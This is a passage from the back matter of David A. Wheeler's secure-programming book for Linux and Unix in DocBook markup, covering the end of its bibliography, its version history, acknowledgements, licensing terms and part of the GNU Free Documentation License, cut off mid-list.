||
<emphasis remap="it">The World Wide Web Security FAQ</emphasis>.
|
||
Version 2.0.1
|
||
<ulink
|
||
url="http://www.w3.org/Security/Faq/www-security-faq.html">http://www.w3.org/Security/Faq/www-security-faq.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Swan 2001]
|
||
Swan, Daniel.
|
||
January 6, 2001.
|
||
comp.os.linux.security FAQ.
|
||
Version 1.0.
|
||
<ulink url="http://www.linuxsecurity.com/docs/colsfaq.html">http://www.linuxsecurity.com/docs/colsfaq.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Swanson 1996]
|
||
Swanson, Marianne, and Barbara Guttman.
|
||
September 1996.
|
||
Generally Accepted Principles and Practices for Securing
|
||
Information Technology Systems.
|
||
NIST Computer Security Special Publication (SP) 800-14.
|
||
<ulink url="http://csrc.nist.gov/publications/nistpubs/index.html">http://csrc.nist.gov/publications/nistpubs/index.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Thompson 1974]
|
||
Thompson, K. and D.M. Richie.
|
||
July 1974.
|
||
``The UNIX Time-Sharing System''.
|
||
<emphasis remap="it">Communications of the ACM</emphasis>
|
||
Vol. 17, No. 7.
|
||
pp. 365-375.
|
||
<!-- Revised and reprinted in Ritchie 1978a; see Bach 1986 -->
|
||
</para>
|
||
|
||
<para>
|
||
[Torvalds 1999]
|
||
Torvalds, Linus.
|
||
February 1999.
|
||
``The Story of the Linux Kernel''.
|
||
<emphasis remap="it">Open Sources: Voices from the Open Source Revolution</emphasis>.
|
||
Edited by Chris Dibona, Mark Stone, and Sam Ockman.
|
||
O'Reilly and Associates.
|
||
ISBN 1565925823.
|
||
<ulink
|
||
url="http://www.oreilly.com/catalog/opensources/book/linus.html">http://www.oreilly.com/catalog/opensources/book/linus.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[TruSecure 2001]
|
||
TruSecure.
|
||
August 2001.
|
||
Open Source Security: A Look at the Security Benefits of Source Code Access.
|
||
<ulink url="http://www.trusecure.com/html/tspub/whitepapers/open_source_security5.pdf">http://www.trusecure.com/html/tspub/whitepapers/open_source_security5.pdf</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Unknown]
|
||
<emphasis remap="it">SETUID(7)</emphasis>
|
||
<ulink
|
||
url="http://www.homeport.org/~adam/setuid.7.html">http://www.homeport.org/~adam/setuid.7.html</ulink>.
|
||
<!-- Claimed to be from Dan Farmer's COPS, but COPS does not include it. -->
|
||
</para>
|
||
|
||
<para>
|
||
[Van Biesbrouck 1996]
|
||
Van Biesbrouck, Michael.
|
||
April 19, 1996.
|
||
<ulink url="http://www.csclub.uwaterloo.ca/u/mlvanbie/cgisec">http://www.csclub.uwaterloo.ca/u/mlvanbie/cgisec</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[van Oorschot 1994]
|
||
van Oorschot, P. and M. Wiener.
|
||
November 1994.
|
||
``Parallel Collision Search with Applications to Hash Functions
|
||
and Discrete Logarithms.''
|
||
Proceedings of ACM Conference on Computer and Communications Security.
|
||
</para>
|
||
|
||
<para>
|
||
[Venema 1996]
|
||
Venema, Wietse.
|
||
1996.
|
||
Murphy's law and computer security.
|
||
<ulink url="http://www.fish.com/security/murphy.html">http://www.fish.com/security/murphy.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Viega 2002]
|
||
Viega, John, and Gary McGraw.
|
||
2002.
|
||
Building Secure Software.
|
||
Addison-Wesley.
|
||
ISBN 0201-72152-X.
|
||
</para>
|
||
|
||
<para>
|
||
[Watters 1996]
|
||
Watters, Arron, Guido van Rossum, James C. Ahlstrom.
|
||
1996.
|
||
Internet Programming with Python.
|
||
NY, NY: Henry Hold and Company, Inc.
|
||
</para>
|
||
|
||
<para>
|
||
[Wheeler 1996]
|
||
Wheeler, David A., Bill Brykczynski, and Reginald N. Meeson, Jr.
|
||
Software Inspection: An Industry Best Practice.
|
||
1996.
|
||
Los Alamitos, CA: IEEE Computer Society Press.
|
||
IEEE Copmuter Society Press Order Number BP07340.
|
||
Library of Congress Number 95-41054.
|
||
ISBN 0-8186-7340-0.
|
||
</para>
|
||
|
||
<para>
|
||
[Witten 2001]
|
||
September/October 2001.
|
||
Witten, Brian, Carl Landwehr, and Michael Caloyannides.
|
||
``Does Open Source Improve System Security?''
|
||
IEEE Software.
|
||
pp. 57-61.
|
||
<ulink url="http://www.computer.org/software">http://www.computer.org/software</ulink>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
[Wood 1985]
|
||
Wood, Patrick H. and Stephen G. Kochan.
|
||
1985.
|
||
<emphasis remap="it">Unix System Security</emphasis>.
|
||
Indianapolis, Indiana: Hayden Books.
|
||
ISBN 0-8104-6267-2.
|
||
</para>
|
||
|
||
<para>
|
||
[Wreski 1998]
|
||
Wreski, Dave.
|
||
August 22, 1998.
|
||
<emphasis remap="it">Linux Security Administrator's Guide</emphasis>.
|
||
Version 0.98.
|
||
<ulink
|
||
url="http://www.nic.com/~dave/SecurityAdminGuide/index.html">http://www.nic.com/~dave/SecurityAdminGuide/index.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Yoder 1998]
|
||
Yoder, Joseph and Jeffrey Barcalow.
|
||
1998.
|
||
Architectural Patterns for Enabling Application Security.
|
||
PLoP '97
|
||
<ulink url="http://st-www.cs.uiuc.edu/~hanmer/PLoP-97/Proceedings/yoder.pdf">
|
||
http://st-www.cs.uiuc.edu/~hanmer/PLoP-97/Proceedings/yoder.pdf</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Zalewski 2001]
|
||
Zalewski, Michael.
|
||
May 16-17, 2001.
|
||
Delivering Signals for Fun and Profit:
|
||
Understanding, exploiting and preventing signal-handling related
|
||
vulnerabilities.
|
||
Bindview Corporation.
|
||
<ulink url="http://razor.bindview.com/publish/papers/signals.txt">http://razor.bindview.com/publish/papers/signals.txt</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Zoebelein 1999]
|
||
Zoebelein, Hans U.
|
||
April 1999.
|
||
The Internet Operating System Counter.
|
||
<ulink url="http://www.leb.net/hzo/ioscount">http://www.leb.net/hzo/ioscount</ulink>.
|
||
</para>
|
||
|
||
</chapter>
|
||
|
||
<appendix id="document-history">
|
||
<title>History</title>
|
||
<para>
|
||
Here are a few key events in the development of this book, starting
|
||
from most recent events:
|
||
|
||
<variablelist>
|
||
|
||
<varlistentry><term>
|
||
2002-10-29 David A. Wheeler
|
||
</term>
|
||
<listitem>
|
||
<para>
|
||
Version 3.000 released, adding a new section on determining
|
||
security requirements and a discussion of the Common Criteria,
|
||
broadening the document.
|
||
Many smaller improvements were incorporated as well.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry><term>
|
||
2001-01-01 David A. Wheeler
|
||
</term>
|
||
<listitem>
|
||
<para>
|
||
Version 2.70 released, adding a significant amount of additional material,
|
||
such as a significant expansion of the discussion of cross-site
|
||
malicious content, HTML/URI filtering, and handling temporary files.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry><term>
|
||
2000-05-24 David A. Wheeler
|
||
</term>
|
||
<listitem>
|
||
<para>
|
||
Switched to GNU's GFDL license, added more content.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry><term>
|
||
2000-04-21 David A. Wheeler
|
||
</term>
|
||
<listitem>
|
||
<para>
|
||
Version 2.00 released, dated 21 April 2000, which switched the
|
||
document's internal format from the Linuxdoc DTD to the DocBook DTD.
|
||
Thanks to Jorge Godoy for helping me perform the transition.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
|
||
<varlistentry><term>
|
||
2000-04-04 David A. Wheeler
|
||
</term>
|
||
<listitem>
|
||
<para>
|
||
Version 1.60 released;
|
||
changed so that it now covers <emphasis>both</emphasis> Linux and Unix.
|
||
Since most of the guidelines covered both, and many/most app developers want
|
||
their apps to run on both, it made sense to cover both.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry><term>
|
||
2000-02-09 David A. Wheeler
|
||
</term>
|
||
<listitem>
|
||
<para>
|
||
Noted that the document is now part of the Linux Documentation Project (LDP).
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry><term>
|
||
1999-11-29 David A. Wheeler
|
||
</term>
|
||
<listitem>
|
||
<para>
|
||
Initial version (1.0) completed and released to the public.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
</variablelist>
|
||
</para>
|
||
|
||
<para>
|
||
Note that a more detailed description of changes is available on-line
|
||
in the ``ChangeLog'' file.
|
||
</para>
|
||
</appendix>
|
||
|
||
<appendix id="acknowledgements">
|
||
<title>Acknowledgements</title>
|
||
|
||
<epigraph>
|
||
<attribution>Proverbs 27:17 (NIV)</attribution>
|
||
<para>
|
||
As iron sharpens iron, so one man sharpens another.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<para>
|
||
My thanks to the following people who kept me honest by sending me emails
|
||
noting errors, suggesting areas to cover, asking questions, and so on.
|
||
Where email addresses are included, they've been
|
||
shrouded by prepending my ``thanks.'' so bulk emailers
|
||
won't easily get these addresses; inclusion of people in this list is
|
||
<emphasis>not</emphasis> an authorization to send
|
||
unsolicited bulk email to them.
|
||
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
Neil Brown (thanks.neilb@cse.unsw.edu.au)
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Martin Douda (thanks.mad@students.zcu.cz)
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Jorge Godoy
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Scott Ingram (thanks.scott@silver.jhuapl.edu)
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Michael Kerrisk
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Doug Kilpatrick
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
John Levon (levon@movementarian.org)
|
||
<!-- was John Levon (moz@compsoc.man.ac.uk) -->
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Ryan McCabe (thanks.odin@numb.org)
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Paul Millar (thanks.paulm@astro.gla.ac.uk)
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Chuck Phillips (thanks.cdp@peakpeak.com)
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Martin Pool (thanks.mbp@humbug.org.au)
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Eric S. Raymond (thanks.esr@snark.thyrsus.com)
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Marc Welz
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Eric Werme (thanks.werme@alpha.zk3.dec.com)
|
||
</para></listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
If you want to be on this list, please send me a constructive suggestion at
|
||
<ulink
|
||
url="mailto:dwheeler@dwheeler.com">dwheeler@dwheeler.com</ulink>.
|
||
If you send me a constructive suggestion, but do <emphasis remap="it">not</emphasis> want credit,
|
||
please let me know that when you send your suggestion, comment, or
|
||
criticism; normally I expect that people want credit, and I want to give
|
||
them that credit.
|
||
My current process is to add contributor names to this list in the document,
|
||
with more detailed explanation of their comment in the ChangeLog for
|
||
this document (available on-line).
|
||
Note that although these people have sent in ideas, the actual text is my own,
|
||
so don't blame them for any errors that may remain.
|
||
Instead, please send me another constructive suggestion.
|
||
</para>
|
||
|
||
</appendix>
|
||
|
||
<appendix id="about-license">
|
||
<title>About the Documentation License</title>
|
||
|
||
<epigraph>
|
||
<attribution>Esther 3:14 (NIV)</attribution>
|
||
<para>
|
||
A copy of the text of the edict was to be issued as law
|
||
in every province and made known to the people of every
|
||
nationality so they would be ready for that day.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<para>
|
||
This document is Copyright (C) 1999-2000 David A. Wheeler.
|
||
Permission is granted to copy, distribute and/or modify
|
||
this document under the terms of the GNU Free Documentation License (FDL),
|
||
Version 1.1 or any later version published by the Free Software Foundation;
|
||
with the invariant sections being ``About the Author'',
|
||
with no Front-Cover Texts, and no Back-Cover texts.
|
||
A copy of the license is included below in
|
||
<xref linkend="fdl">.
|
||
</para>
|
||
|
||
<para>
|
||
These terms do permit mirroring by other web sites,
|
||
but be <emphasis remap="it">sure</emphasis> to do the following:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
make sure your mirrors automatically get upgrades from the master site,
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
<para>
|
||
clearly show the location of the master site
|
||
(<ulink
|
||
url="http://www.dwheeler.com/secure-programs">http://www.dwheeler.com/secure-programs</ulink>), with a hypertext link
|
||
to the master site, and
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
give me (David A. Wheeler) credit as the author.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
The first two points primarily protect me from repeatedly hearing about
|
||
obsolete bugs.
|
||
I do not want to hear about bugs I fixed a year ago, just because you
|
||
are not properly mirroring the document.
|
||
By linking to the master site,
|
||
users can check and see if your mirror is up-to-date.
|
||
I'm sensitive to the problems of sites which have very
|
||
strong security requirements and therefore cannot risk normal
|
||
connections to the Internet; if that describes your situation,
|
||
at least try to meet the other points
|
||
and try to occasionally sneakernet updates into your environment.
|
||
</para>
|
||
|
||
<para>
|
||
By this license, you may modify the document,
|
||
but you can't claim that what you didn't write is yours (i.e., plagiarism)
|
||
nor can you pretend that a modified version is identical to
|
||
the original work.
|
||
Modifying the work does not transfer copyright of the entire work to you;
|
||
this is not a ``public domain'' work in terms of copyright law.
|
||
See the license in <xref linkend="fdl"> for details.
|
||
If you have questions about what the license allows, please contact me.
|
||
In most cases, it's better if you send your changes to the master
|
||
integrator (currently David A. Wheeler), so that your changes will be
|
||
integrated with everyone else's changes into the master copy.
|
||
</para>
|
||
|
||
<para>
|
||
I am not a lawyer, nevertheless, it's my position as an author
|
||
and software developer that any code fragments
|
||
not explicitly marked otherwise are so small that their use fits under
|
||
the ``fair use'' doctrine in copyright law.
|
||
In other words, unless marked otherwise, you can use the code fragments
|
||
without any restriction at all.
|
||
Copyright law does not permit copyrighting absurdly small components
|
||
of a work
|
||
(e.g., ``I own all rights to B-flat and B-flat minor chords''), and
|
||
the fragments not marked otherwise are of the same kind of minuscule
|
||
size when compared to real programs.
|
||
I've done my best to give credit for specific pieces of code
|
||
written by others.
|
||
Some of you may still be concerned about the legal status of this code,
|
||
and I want make sure that it's clear
|
||
that you can use this code in your software.
|
||
Therefore, code fragments included directly in this document not otherwise
|
||
marked have also been released by me under the terms of the ``MIT license'',
|
||
to ensure you that there's no serious legal encumbrance:
|
||
</para>
|
||
|
||
<programlisting width="66">
|
||
Source code in this book not otherwise identified is
|
||
Copyright (c) 1999-2001 David A. Wheeler.
|
||
|
||
Permission is hereby granted, free of charge, to any person
|
||
obtaining a copy of the source code in this book not
|
||
otherwise identified (the "Software"), to deal in the
|
||
Software without restriction, including without limitation
|
||
the rights to use, copy, modify, merge, publish, distribute,
|
||
sublicense, and/or sell copies of the Software, and to
|
||
permit persons to whom the Software is furnished to do so,
|
||
subject to the following conditions:
|
||
|
||
The above copyright notice and this permission notice shall be
|
||
included in all copies or substantial portions of the Software.
|
||
|
||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
|
||
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
|
||
PURPOSE AND NONINFRINGEMENT.
|
||
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
|
||
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
|
||
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
|
||
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
|
||
OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
|
||
</programlisting>
|
||
|
||
</appendix>
|
||
|
||
|
||
<!-- Previously it had label="A" -->
|
||
<appendix id="fdl">
|
||
<title>GNU Free Documentation License</title>
|
||
<para>
|
||
Version 1.1, March 2000
|
||
</para>
|
||
|
||
<para>
|
||
Copyright © 2000
|
||
<address>
|
||
Free Software Foundation, Inc.
|
||
<street>59 Temple Place, Suite 330</street>,
|
||
<city>Boston</city>,
|
||
<state>MA</state>
|
||
<postcode>02111-1307</postcode>
|
||
<country>USA</country>
|
||
</address>
|
||
Everyone is permitted to copy and distribute verbatim copies of this license
|
||
document, but changing it is not allowed.
|
||
</para>
|
||
|
||
<variablelist>
|
||
<varlistentry id="fdl-preamble">
|
||
<term>0. PREAMBLE</term>
|
||
<listitem>
|
||
<para>
|
||
The purpose of this License is to make a manual, textbook, or other
|
||
written document "free" in the sense of freedom: to assure everyone
|
||
the effective freedom to copy and redistribute it, with or without
|
||
modifying it, either commercially or noncommercially. Secondarily,
|
||
this License preserves for the author and publisher a way to get
|
||
credit for their work, while not being considered responsible for
|
||
modifications made by others.
|
||
</para>
|
||
|
||
<para>
|
||
This License is a kind of "copyleft", which means that derivative
|
||
works of the document must themselves be free in the same sense. It
|
||
complements the GNU General Public License, which is a copyleft
|
||
license designed for free software.
|
||
</para>
|
||
|
||
<para>
|
||
We have designed this License in order to use it for manuals for free
|
||
software, because free software needs free documentation: a free
|
||
program should come with manuals providing the same freedoms that the
|
||
software does. But this License is not limited to software manuals; it
|
||
can be used for any textual work, regardless of subject matter or
|
||
whether it is published as a printed book. We recommend this License
|
||
principally for works whose purpose is instruction or reference.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
<varlistentry id="fdl-section1">
|
||
<term>1. APPLICABILITY AND DEFINITIONS</term>
|
||
<listitem>
|
||
<para id="fdl-document">
|
||
This License applies to any manual or other work that contains a
|
||
notice placed by the copyright holder saying it can be distributed
|
||
under the terms of this License. The <link
|
||
linkend="fdl-document">"Document" </link>, below, refers to any such
|
||
manual or work. Any member of the public is a licensee, and is
|
||
addressed as "you".
|
||
</para>
|
||
|
||
<para id="fdl-modified">
|
||
A <link linkend="fdl-modified">"Modified Version"</link> of the
|
||
Document means any work containing the Document or a portion of it,
|
||
either copied verbatim, or with modifications and/or translated into
|
||
another language.
|
||
</para>
|
||
|
||
<para id="fdl-secondary">
|
||
A <link linkend="fdl-secondary">"Secondary Section"</link> is a named
|
||
appendix or a front-matter section of the <link
|
||
linkend="fdl-document">Document</link> that deals exclusively with the
|
||
relationship of the publishers or authors of the <link
|
||
linkend="fdl-document"> Document</link> to the <link
|
||
linkend="fdl-document"> Document's</link> overall subject (or to
|
||
related matters) and contains nothing that could fall directly within
|
||
that overall subject. (For example, if the <link
|
||
linkend="fdl-document">Document</link> is in part a textbook of
|
||
mathematics, a <link linkend="fdl-secondary">Secondary Section</link>
|
||
may not explain any mathematics.) The relationship could be a matter
|
||
of historical connection with the subject or with related matters, or
|
||
of legal, commercial, philosophical, ethical or political position
|
||
regarding them.
|
||
</para>
|
||
|
||
<para id="fdl-invariant">
|
||
The <link linkend="fdl-invariant">"Invariant Sections"</link> are
|
||
certain <link linkend="fdl-secondary"> Secondary Sections</link> whose
|
||
titles are designated, as being those of <link
|
||
linkend="fdl-invariant">Invariant Sections</link>, in the notice that
|
||
says that the <link linkend="fdl-document">Document</link> is released
|
||
under this License.
|
||
</para>
|
||
|
||
<para id="fdl-cover-texts">
|
||
The <link linkend="fdl-cover-texts">"Cover Texts"</link> are certain
|
||
short passages of text that are listed, as <link
|
||
linkend="fdl-cover-texts">Front-Cover Texts</link> or <link
|
||
linkend="fdl-cover-texts">Back-Cover Texts</link>, in the notice that
|
||
says that the <link linkend="fdl-document">Document</link> is released
|
||
under this License.
|
||
</para>
|
||
|
||
<para id="fdl-transparent">
|
||
A <link linkend="fdl-transparent">"Transparent"</link> copy of the
|
||
<link linkend="fdl-document"> Document</link> means a machine-readable
|
||
copy, represented in a format whose specification is available to the
|
||
general public, whose contents can be viewed and edited directly and
|
||
straightforwardly with generic text editors or (for images composed of
|
||
pixels) generic paint programs or (for drawings) some widely available
|
||
drawing editor, and that is suitable for input to text formatters or
|
||
for automatic translation to a variety of formats suitable for input
|
||
to text formatters. A copy made in an otherwise <link
|
||
linkend="fdl-transparent"> Transparent</link> file format whose markup
|
||
has been designed to thwart or discourage subsequent modification by
|
||
readers is not <link linkend="fdl-transparent">Transparent</link>. A
|
||
copy that is not <link linkend="fdl-transparent">"Transparent"</link>
|
||
is called "Opaque".
|
||
</para>
|
||
|
||
<para>
|
||
Examples of suitable formats for <link
|
||
linkend="fdl-transparent">Transparent</link> copies include plain
|
||
ASCII without markup, Texinfo input format, LaTeX input format, SGML
|
||
or XML using a publicly available DTD, and standard-conforming simple
|
||
HTML designed for human modification. Opaque formats include
|
||
PostScript, PDF, proprietary formats that can be read and edited only
|
||
by proprietary word processors, SGML or XML for which the DTD and/or
|
||
processing tools are not generally available, and the
|
||
machine-generated HTML produced by some word processors for output
|
||
purposes only.
|
||
</para>
|
||
|
||
<para id="fdl-title-page">
|
||
The <link linkend="fdl-title-page">"Title Page"</link> means, for a
|
||
printed book, the title page itself, plus such following pages as are
|
||
needed to hold, legibly, the material this License requires to appear
|
||
in the title page. For works in formats which do not have any title
|
||
page as such, <link linkend="fdl-title-page"> "Title Page"</link>
|
||
means the text near the most prominent appearance of the work's title,
|
||
preceding the beginning of the body of the text.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry id="fdl-section2">
|
||
<term>2. VERBATIM COPYING</term>
|
||
<listitem>
|
||
<para>
|
||
You may copy and distribute the <link
|
||
linkend="fdl-document">Document</link> in any medium, either
|
||
commercially or noncommercially, provided that this License, the
|
||
copyright notices, and the license notice saying this License applies
|
||
to the <link linkend="fdl-document">Document</link> are reproduced in
|
||
all copies, and that you add no other conditions whatsoever to those
|
||
of this License. You may not use technical measures to obstruct or
|
||
control the reading or further copying of the copies you make or
|
||
distribute. However, you may accept compensation in exchange for
|
||
copies. If you distribute a large enough number of copies you must
|
||
also follow the conditions in <link linkend="fdl-section3">section
|
||
3</link>.
|
||
</para>
|
||
|
||
<para>
|
||
You may also lend copies, under the same conditions stated above, and
|
||
you may publicly display copies.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry id="fdl-section3">
|
||
<term>3. COPYING IN QUANTITY</term>
|
||
<listitem>
|
||
<para>
|
||
If you publish printed copies of the <link
|
||
linkend="fdl-document">Document</link> numbering more than 100, and
|
||
the <link linkend="fdl-document">Document's</link> license notice
|
||
requires <link linkend="fdl-cover-texts">Cover Texts</link>, you must
|
||
enclose the copies in covers that carry, clearly and legibly, all
|
||
these <link linkend="fdl-cover-texts">Cover Texts</link>: Front-Cover
|
||
Texts on the front cover, and Back-Cover Texts on the back cover. Both
|
||
covers must also clearly and legibly identify you as the publisher of
|
||
these copies. The front cover must present the full title with all
|
||
words of the title equally prominent and visible. You may add other
|
||
material on the covers in addition. Copying with changes limited to
|
||
the covers, as long as they preserve the title of the <link
|
||
linkend="fdl-document">Document</link> and satisfy these conditions,
|
||
can be treated as verbatim copying in other respects.
|
||
</para>
|
||
|
||
<para>
|
||
If the required texts for either cover are too voluminous to fit
|
||
legibly, you should put the first ones listed (as many as fit
|
||
reasonably) on the actual cover, and continue the rest onto adjacent
|
||
pages.
|
||
</para>
|
||
|
||
<para>
|
||
If you publish or distribute <link
|
||
linkend="fdl-transparent">Opaque</link> copies of the <link
|
||
linkend="fdl-document">Document</link> numbering more than 100, you
|
||
must either include a machine-readable <link
|
||
linkend="fdl-transparent">Transparent</link> copy along with each
|
||
<link linkend="fdl-transparent">Opaque</link> copy, or state in or
|
||
with each <link linkend="fdl-transparent">Opaque</link> copy a
|
||
publicly-accessible computer-network location containing a complete
|
||
<link linkend="fdl-transparent"> Transparent</link> copy of the <link
|
||
linkend="fdl-document">Document</link>, free of added material, which
|
||
the general network-using public has access to download anonymously at
|
||
no charge using public-standard network protocols. If you use the
|
||
latter option, you must take reasonably prudent steps, when you begin
|
||
distribution of <link linkend="fdl-transparent">Opaque</link> copies
|
||
in quantity, to ensure that this <link
|
||
linkend="fdl-transparent">Transparent</link> copy will remain thus
|
||
accessible at the stated location until at least one year after the
|
||
last time you distribute an <link
|
||
linkend="fdl-transparent">Opaque</link> copy (directly or through your
|
||
agents or retailers) of that edition to the public.
|
||
</para>
|
||
|
||
<para>
|
||
It is requested, but not required, that you contact the authors of the
|
||
<link linkend="fdl-document">Document</link> well before
|
||
redistributing any large number of copies, to give them a chance to
|
||
provide you with an updated version of the <link
|
||
linkend="fdl-document">Document</link>.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry id="fdl-section4">
|
||
<term>4. MODIFICATIONS</term>
|
||
<listitem>
|
||
<para>
|
||
You may copy and distribute a <link linkend="fdl-modified">Modified
|
||
Version</link> of the <link linkend="fdl-document">Document</link>
|
||
under the conditions of sections <link linkend="fdl-section2">2</link>
|
||
and <link linkend="fdl-section3">3</link> above, provided that you
|
||
release the <link linkend="fdl-modified">Modified Version</link> under
|
||
precisely this License, with the <link linkend="fdl-modified">Modified
|
||
Version</link> filling the role of the <link
|
||
linkend="fdl-document">Document</link>, thus licensing distribution
|
||
and modification of the <link linkend="fdl-modified">Modified
|
||
Version</link> to whoever possesses a copy of it. In addition, you
|
||
must do these things in the <link linkend="fdl-modified">Modified
|
||
Version</link>:
|
||
</para>
|
||
|
||
<orderedlist numeration="upperalpha">
|
||
<listitem>
|
||
<para>
|
||
Use in the <link linkend="fdl-title-page">Title Page</link> (and
|
||
on the covers, if any) a title distinct from that of the <link
|
||
linkend="fdl-document">Document</link>, and from those of
|
||
previous versions (which should, if there were any, be listed in
|
||
the History section of the <link
|
||
linkend="fdl-document">Document</link>). You may use the same
|
||
title as a previous version if the original publisher of that
|
||
version gives permission.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
List on the <link linkend="fdl-title-page">Title Page</link>, as
|
||
authors, one or more persons or entities responsible for
|
||
authorship of the modifications in the <link
|
||
linkend="fdl-modified">Modified Version</link>, together with at
|
||
least five of the principal authors of the <link
|
||
linkend="fdl-document">Document</link> (all of its principal
|
||
authors, if it has less than five).
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
State on the <link linkend="fdl-title-page">Title Page</link>
|
||
the name of the publisher of the <link
|
||
linkend="fdl-modified">Modified Version</link>, as the
|
||
publisher.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Preserve all the copyright notices of the <link
|
||
linkend="fdl-document">Document</link>.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Add an appropriate copyright notice for your modifications
|
||
adjacent to the other copyright notices.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Include, immediately after the copyright notices, a license
|
||
notice giving the public permission to use the <link
|
||
linkend="fdl-modified">Modified Version</link> under the terms
|
||
of this License, in the form shown in the Addendum below.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Preserve in that license notice the full lists of <link
|
||
linkend="fdl-invariant"> Invariant Sections</link> and required
|
||
<link linkend="fdl-cover-texts">Cover Texts</link> given in the
|
||
<link linkend="fdl-document">Document's</link> license notice.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Include an unaltered copy of this License.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Preserve the section entitled "History", and its title, and add
|
||
to it an item stating at least the title, year, new authors, and
|
||
publisher of the <link linkend="fdl-modified">Modified Version
|
||
</link>as given on the <link linkend="fdl-title-page">Title
|
||
Page</link>. If there is no section entitled "History" in the
|
||
<link linkend="fdl-document">Document</link>, create one stating
|
||
the title, year, authors, and publisher of the <link
|
||
linkend="fdl-document">Document</link> as given on its <link
|
||
linkend="fdl-title-page">Title Page</link>, then add an item
|
||
describing the <link linkend="fdl-modified">Modified
|
||
Version</link> as stated in the previous sentence.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Preserve the network location, if any, given in the <link
|
||
linkend="fdl-document">Document</link> for public access to a
|
||
<link linkend="fdl-transparent">Transparent</link> copy of the
|
||
<link linkend="fdl-document">Document</link>, and likewise the
|
||
network locations given in the <link
|
||
linkend="fdl-document">Document</link> for previous versions it
|
||
was based on. These may be placed in the "History" section. You
|
||
may omit a network location for a work that was published at
|
||
least four years before the <link
|
||
linkend="fdl-document">Document</link> itself, or if the
|
||
original publisher of the version it refers to gives permission.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
In any section entitled "Acknowledgements" or "Dedications",
|
||
preserve the section's title, and preserve in the section all
|
||
the substance and tone of each of the contributor
|
||
acknowledgements and/or dedications given therein.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Preserve all the <link linkend="fdl-invariant">Invariant
|
||
Sections</link> of the <link
|
||
linkend="fdl-document">Document</link>, unaltered in their text
|
||
and in their titles. Section numbers or the equivalent are not
|
||
considered part of the section titles.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Delete any section entitled "Endorsements". Such a section may
|
||
not be included in the <link linkend="fdl-modified">Modified
|
||
Version</link>.
|
||
</para>
|
||
</listitem>
|
||
|
||
